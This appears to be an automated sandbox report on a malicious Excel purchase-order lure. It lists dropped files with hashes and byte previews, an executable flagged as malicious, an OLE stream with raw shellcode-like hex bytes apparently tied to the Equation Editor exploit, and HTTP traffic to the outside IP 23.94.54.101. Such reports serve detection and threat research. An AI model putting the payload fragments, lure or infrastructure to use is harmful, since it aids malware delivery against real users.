                                        Process:C:\Users\user\AppData\Roaming\CKK.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):267776
                                        Entropy (8bit):7.871261495692861
                                        Encrypted:false
                                        SSDEEP:6144:vKPYhPrqcfpcB4qnSfMYmOeaNEj634MxhCMHhru:yPKJS42SfxmfaNEh+tJu
                                        MD5:5A70B0E741E9BE8A93A6353E6CDB6BBD
                                        SHA1:567C37816D5101104953F1CC5A9F0D74E78B9F5C
                                        SHA-256:AACE6CA3B7215B5BF87C91167D4FB7C008CE0F4B9FA3B77877F3123018D066F5
                                        SHA-512:E1F21571D366462B73C1B7B1954E70A99E13A651F470BDFBC42F9F0F86034CE60761379BC0EFF1ED78CF8C6FBF85C10AB38B3BB4819A34031ADE083833955723
                                        Malicious:false
                                        Reputation:low
                                        Preview:u..TDX6BWVHV..8H.TGX6BSV.VPH8HQTGX6BSVHVPH8HQTGX6BSVHVPH8HQT.X6B]I.XP.1.p.F..c.>!%p8J'6&&5.!28&9$hZ-q&26.+=v...hU'51iU;HwVHVPH8H9D.u.3.(d'.6.9.*u{I<l'.([..6z%.&.3.(.'.6.k?*[).<au!(.9.6cw<&.3.(.?3 .9.*GX6BSVHVPH8HQTGX..A0HVPHh.QT.Y2B'.H.PH8HQTGX.BpWCWYH8.PTG"4BSVHV..8HQDGX6.RVHV.H8XQTGZ6BVVHVPH8HTTGX6BSVH6TH8LQT.c4BQVH.PH(HQDGX6BCVHFPH8HQTWX6BSVHVPH8H.AEXfBSVH6RH..PTGX6BSVHVPH8HQTGX6BSVHVPH..PT[X6BSVHVPH8HQTGX6BSVHVPH8HQT.U4B.VHVPH8HQTGX6.RV.WPH8HQTGX6BSVHVPH8HQTGX6BSVf"50LHQT_.7BSFHVP.9HQPGX6BSVHVPH8HQTgX6"}$,7$)8H.9GX6.RVH8PH8.PTGX6BSVHVPH8H.TG..&2")VPH.xQTGx4BS@HVPB:HQTGX6BSVHVPHxHQ.i*E00VHV..9HQ4EX6.RVHvRH8HQTGX6BSVHV.H8.QTGX6BSVHVPH8HQTGX6BSVHVPH8HQTGX6BSVHVPH8HQTGX6BSVHVPH8HQTGX6BSVHVPH8HQTGX6BSVHVPH8HQTGX6BSVHVPH8HQTGX6BSVHVPH8HQTGX6BSVHVPH8HQTGX6BSVHVPH8HQTGX6BSVHVPH8HQTGX6BSVHVPH8HQTGX6BSVHVPH8HQTGX6BSVHVPH8HQTGX6BSVHVPH8HQTGX6BSVHVPH8HQTGX6BSVHVPH8HQTGX6BSVHVPH8HQTGX6BSVHVPH8HQTGX6BSVHVPH8HQTGX6BSVHVPH8HQTGX6BSVHVPH8HQTGX6BSVHVPH8HQTGX6BSVHVPH8HQTGX6BSVHVPH8HQTGX6BSVHVPH8HQTGX
                                        Process:C:\Users\user\AppData\Roaming\CKK.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):265430
                                        Entropy (8bit):7.978474061574863
                                        Encrypted:false
                                        SSDEEP:6144:1B28qzcAxd40Yn8M/jKbd37+/orNpicivLRDhrNuCIZr98YQuSUYk:1B2Xbd458xJ37+/orLicijRVBuCIZr91
                                        MD5:F2A14BB5825833AC7A44FA6F80757411
                                        SHA1:9D3AA84BA40B44968B3F69C38F950B55FF042053
                                        SHA-256:6854140A8F1472C3E84B6F1D6390920AE5737C67961E809DE10C34FEFD8663D4
                                        SHA-512:66C5273428E48F6C2E596E7300D169043567FBABFEBCD037446B0AC433EF779BA3D5A40F1E237AB1B0D3A43154563CB31AFA274A5A694E4CDC67C5DC993E7FFA
                                        Malicious:false
                                        Reputation:low
                                        Preview:EA06......5J%bmB...m~.qH..(...N...T)..ED.;4...N..Wi?*.C.1..=.h.....Hd...*O6.I..i..q&..-..m.M2.E.s.23..Ud.Y...;.]...9.p...Qd...I..Uu..g..>.Q[..f...M...%.@...k..r....u..>S....w.I.`..j.3... ...3.A...6.mF....R.."..9....W...4..B.T........8Q....H.8.R'.....6.U..3T....H.S*5M.iB...j."P.q....H..1b....-..X...U*FS{P.P.?...R....y.J.L.s...2..I..SY.0.8....*...p.Ni....W.g.M.W.$.o$..T..........G...Q...4.E)..o..E......)....x.Tr..U.a0..?....iE.M......Q.....%...;..?.D,u..2.Q.hq.).O#>....J...V.H.1.u......&k9..a3..^S...P.h.#{...Z~M..[.U...F...i.X......S,yH7.|..G.q.D.. ..=.j.V.T9..|f.G..w.:..._.~)y{..6.J.0..Co...k..L...R..PH..-.D't-f.o....4....[.Y..nD..p..@....%R..*3.,['P.......n.....&.v.V......."...W..U.T.Vj..."V*.K.[%.:.f.X.W@B.n.o.....;..{\.u..."........_U..R7...{...ou..Tz...".]..mB..!.*.&.M.u.....}*.L+.....v.69.j...H..xq..=r.P*....q...f[....E.H..k...t.Vj<...K.7..D...j......u.R:.@../....x..Z.X...f...b(`.........."...ji.n..a..g.W..~)r.Q....R.X...8ww-....5N<.g..g..*..
                                        Process:C:\Users\user\AppData\Roaming\CKK.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):9858
                                        Entropy (8bit):7.592762175866469
                                        Encrypted:false
                                        SSDEEP:192:C+cKAFEeHCTNT/Uy48+s5DFVZJfJiFF3uEiJWwfJFqS24:h7ACeHCTR2WBVZJBoNuEiJWwew
                                        MD5:52EA0D31E75E368B28CA2A58A9E653FC
                                        SHA1:2AE4801ACAA0FDA9FC8975C9C29DCE1C1C6204C0
                                        SHA-256:BDFFC8EA3EBB6411B678CA19E5DD6D1199B8C44BD8CE53E42A8D99933074DE2F
                                        SHA-512:8DD97AD2B44A01B3EA8E0221B82B97493CB832B22BC88802957DC90D9351466EF1FCA3F1CE25AB25C890C32F5C0B9950D642621A8E8138D37E32F995F5FFC993
                                        Malicious:false
                                        Reputation:low
                                        Preview:EA06..p0.M'.)..e4.N'.).......T9..l.0L.s.5..3..s.4.8.......k8.Yls....c..&S...k6...S....1.L&.i..i5.M,S....K.@...7...p. ....P.o...m.X.V........9....3...f....s2.Xf@.]..g3@..h.m.M.......8.l..6.....a........i4........g3Y...c ._..k4...d....H, ......Ac.H..g...(.F..=d....>....C`....@02..N@...u......Y..ab.M.]>.$....M.x>;$....N.j.;%....X.j.;%......j.;,....P'.b.5... .^..f./Z..@F.6.z..G......`......i..G../Z...zqd...l.;.........|......7...}3{(........;^..l =..p.........3p.o....,.......x.....H<.lX.:...b.....,. ...2...f.[...K.)....b..i|v F......X......`....,.9....5...._..l......>K.....ir.e....[4..d..f.y.....,.....S >..p...........s9.... !..Y....f...ja4....ea.h,.p.....,.a8.,..3........f.....f ....,j.0..&...J......f ....6K%.ke..f....L..;2.X...4.Y.V@.Fn.....f@....l..05.....!;3.X...c )D.g6... ...'&`....,f.6..&....r...Brh.....l...i2...B....@.......d.L.`!.....P...@X5d..lSK...9...!;5.X...cVY......'.B...,vl.!..>.a..l...M..@...X...b.M&.X..B.a.Q...sp..X..9..o5..f.!...,vn......d...
                                        Process:C:\Users\user\AppData\Roaming\CKK.exe
                                        File Type:ASCII text, with very long lines (28720), with no line terminators
                                        Category:dropped
                                        Size (bytes):28720
                                        Entropy (8bit):3.5923337446806256
                                        Encrypted:false
                                        SSDEEP:768:wiTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNbiE+Ik6Ng4vfF3if6gyJ:wiTZ+2QoioGRk6ZklputwjpjBkCiw2RT
                                        MD5:8285D336395C7B6E421735E4C8100590
                                        SHA1:BFEACB0473BEEA2DC4C9C634064467E1D0D70750
                                        SHA-256:2324E3F83072804CB47BAC17572DC6325B04BA13E6E4B0FD4AA40AAA45AA8D02
                                        SHA-512:FBAE37B6FB95499389ED67F6A630F91AE053DC1CE5EC79EADE84D10E79641C91074CA00BE90AD0D34B7C35355B9CDC7C3CA33842E0990D9E176CAC06DC311580
                                        Malicious:false
                                        Reputation:low
Preview:
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):165
                                        Entropy (8bit):1.4377382811115937
                                        Encrypted:false
                                        SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                        MD5:797869BB881CFBCDAC2064F92B26E46F
                                        SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                        SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                        SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                        Malicious:false
                                        Reputation:high, very likely benign file
                                        Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):1219072
                                        Entropy (8bit):7.1031978751916185
                                        Encrypted:false
                                        SSDEEP:24576:jqDEvCTbMWu7rQYlBQcBiT6rprG8aSI5LUWZ0o7F9CR:jTvC/MTQYxsWR7aSIdvTnC
                                        MD5:6DBF70053A37B13C106C623E0934DDFF
                                        SHA1:1362F71BAC0D64092F13F5F9B84E235D6A369055
                                        SHA-256:5D4011E1B0A3CDC0052863536E959285012767BE9A39FFB95FAF811836536922
                                        SHA-512:3A4EC594D47FCC5551010D5E20FC5B317CC98C9C0DBD46F94B6F96002445C4E63DB649B4579E72C07A9DC24192FD07B7F84B0D1970C7729CEB7FFDB04D51F2CF
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 39%
                                        • Antivirus: Virustotal, Detection: 40%, Browse
                                        Reputation:low
                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L...}a3f..........".................w.............@..................................N....@...@.......@.....................d...|....@.......................p...u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc........@...0..................@..@.reloc...u...p...v...$..............@..B........................................................................................................................................................................................................................................................................
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):165
                                        Entropy (8bit):1.4377382811115937
                                        Encrypted:false
                                        SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                        MD5:797869BB881CFBCDAC2064F92B26E46F
                                        SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                        SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                        SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                        Malicious:false
                                        Reputation:high, very likely benign file
                                        Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):165
                                        Entropy (8bit):1.4377382811115937
                                        Encrypted:false
                                        SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                        MD5:797869BB881CFBCDAC2064F92B26E46F
                                        SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                        SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                        SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                        Malicious:false
                                        Reputation:high, very likely benign file
                                        Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                        File type:Microsoft Excel 2007+
                                        Entropy (8bit):7.997957049004658
                                        TrID:
                                        • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                                        • ZIP compressed archive (8000/1) 16.67%
                                        File name:PO 2_5_24.xlam.xlsx
                                        File size:735'951 bytes
                                        MD5:989feda4871b86bfbcec9debb0b2ec45
                                        SHA1:05ef3f9b7d77b9709423222a81d670cbcae013cd
                                        SHA256:26fcc106f92623f06b5eb2e87b2e2e58a2ad9eea51de7d15a15b85dafe44b937
                                        SHA512:ba62b7d1cc358aa8e3525bbb0988274823feef6f485cc9ec2d5d43734c35f0f1d9c978bed490ea6b4cfc25e86a4df5788be8b3bbb3677064be3895d3becd4c44
                                        SSDEEP:12288:r8nWilHGpyCdswU+rUUfvPn9mw1Z68YnQgtJPskWBMpINmNGWBn:Y/0RuFLUfvPn9tk8E7xWuWLWBn
                                        TLSH:9CF43323D1B217AAC2EFC0559C403CC919F1BD1C9377708EBE35D85725E6AE4A658F82
                                        File Content Preview:PK...........X.lc.............[Content_Types].xmlUT.....3f..3f..3f.U.n.0....?..........C..E.&...X.k.6_ .......(...!_......b5...]l0D.l....+..'.mk...g...1.......0......O;.. ..5.R.?8..C..r.-E...H..Z.A..E.u6.....m*S.`..;\..N...>..4...v..R5.....(.7V..).r..J'..
                                        Icon Hash:2562ab89a7b7bfbf
                                        Document Type:OpenXML
                                        Number of OLE Files:1
                                        Has Summary Info:
                                        Application Name:
                                        Encrypted Document:False
                                        Contains Word Document Stream:False
                                        Contains Workbook/Book Stream:False
                                        Contains PowerPoint Document Stream:False
                                        Contains Visio Document Stream:False
                                        Contains ObjectPool Stream:False
                                        Flash Objects Count:0
                                        Contains VBA Macros:False
                                        Author:SHINY
                                        Last Saved By:X10LUXURY
                                        Create Time:2010-06-04T08:55:28Z
                                        Last Saved Time:2023-07-30T22:56:25Z
                                        Creating Application:Microsoft Excel
                                        Security:0
                                        Thumbnail Scaling Desired:false
                                        Company:Grizli777
                                        Contains Dirty Links:false
                                        Shared Document:false
                                        Changed Hyperlinks:false
                                        Application Version:15.0300
                                        General
                                        Stream Path:\x1ole10nATIVe
                                        CLSID:
                                        File Type:data
                                        Stream Size:1031663
                                        Entropy:5.887888766747677
                                        Base64 Encoded:True
                                        Data ASCII:A . . W $ 2 . . . . . G M ) O . ? U . B . . I o ! . . . E . . f S . E . . . . . . . = G . . . / . . . . v U . . . . . . . . . . 2 " ] > . y . ( 1 ] . : i ' I . J 6 ) . . . C . A + 7 . . . . | . $ . . X v . , k . _ _ . . . } T S 9 . x e . . . . y 1 J . ; . X . o Z b X [ . L . . } . | + ] 3 . 7 ? ~ 1 a 8 y u u . . [ . @ ) u ' . Z n . f & K 9 . . . X A ^ . b 5 z / P Q + . % W N | . c . d + ~ 2 D . L c . w . ` . ] ; ^ . . ) . / z . g C N . i 8 . c ) . W i . z . . Z . 4 . ) ' . l K . . ( . k 9 . c . i . d
                                        Data Raw:8d bb 41 03 02 57 24 32 c8 d8 01 08 df b2 bd 7f fd f5 9d 81 e5 7f bf 47 20 8b 4d bd 8b 29 bf 4f 98 b9 ff f7 d7 8b 3f 55 ff d7 83 c0 42 ff e0 b3 8c f2 18 49 f3 d6 6f 21 0b c2 bf 14 45 00 0e ff 80 fd 66 53 1c a5 eb 45 8d 85 15 04 00 00 e9 a6 00 00 00 eb f3 eb 3d eb 47 e9 b1 00 00 00 eb 2f eb 18 e9 9e 00 00 00 e9 80 eb 76 eb 55 e9 91 00 00 00 eb 06 eb 04 eb 09 eb ce eb d7 e9 a4 00 00
                                        General
                                        Stream Path:HYgP2BL0oQEr
                                        CLSID:
                                        File Type:empty
                                        Stream Size:0
                                        Entropy:0.0
                                        Base64 Encoded:False
                                        Data ASCII:
                                        Data Raw:
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 2, 2024 17:39:45.660633087 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:45.770174980 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:45.770526886 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:45.771538019 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:45.883047104 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:45.883065939 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:45.883079052 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:45.883085966 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:45.883198977 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:45.992738008 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:45.992767096 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:45.992786884 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:45.992806911 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:45.992814064 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:45.992830038 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:45.992846012 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:45.992855072 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:45.992876053 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:45.992894888 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:45.992897034 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:45.992938042 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.105245113 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.105268955 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.105283022 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.105295897 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.105309010 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.105320930 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.105334044 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.105345964 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.105355024 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.105359077 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.105379105 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.105381012 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.105391979 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.105391979 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.105407953 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.105422974 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.105431080 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.105437994 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.105451107 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.105459929 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.105463028 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.105493069 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.108309031 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.215398073 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.215434074 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.215460062 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.215477943 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.215527058 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.215539932 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.215569973 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.215599060 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.215612888 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.215641975 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.215662956 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.215701103 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.215745926 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.215775967 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.215837002 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.215879917 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.215903997 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.215917110 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.215946913 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.215971947 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.216044903 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.216058016 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.216084957 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.216089010 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.216146946 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.216180086 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.216191053 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.216214895 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.216258049 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.216259003 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.216285944 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.216321945 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.216325998 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.216363907 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.216403008 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.216408014 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.216428995 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.216470957 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.216471910 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.216515064 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.216527939 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.216557980 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.216578007 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.216620922 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.216622114 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.217696905 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.325017929 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.325032949 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.325077057 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.325083017 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.325112104 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.325155020 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.325180054 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.325237989 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.325284958 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.325284958 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.325300932 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.325344086 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.325360060 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.325406075 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.325417995 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.325443983 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.325469017 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.325514078 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.325537920 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.325615883 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.325664043 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.325671911 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.325731993 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.325773001 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.325788975 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.325886965 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.325930119 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.325939894 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.325983047 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.326013088 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.326024055 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.326064110 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.326096058 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.326107979 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.326170921 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.326214075 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.326225996 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.326293945 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.326334000 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.326369047 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.326447964 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.326491117 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.326502085 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.326580048 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.326621056 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.326643944 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.326746941 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.326792955 CEST | 49161 | 80 | 192.168.2.22 | 23.94.54.101
May 2, 2024 17:39:46.327078104 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
May 2, 2024 17:39:46.327147007 CEST | 80 | 49161 | 23.94.54.101 | 192.168.2.22
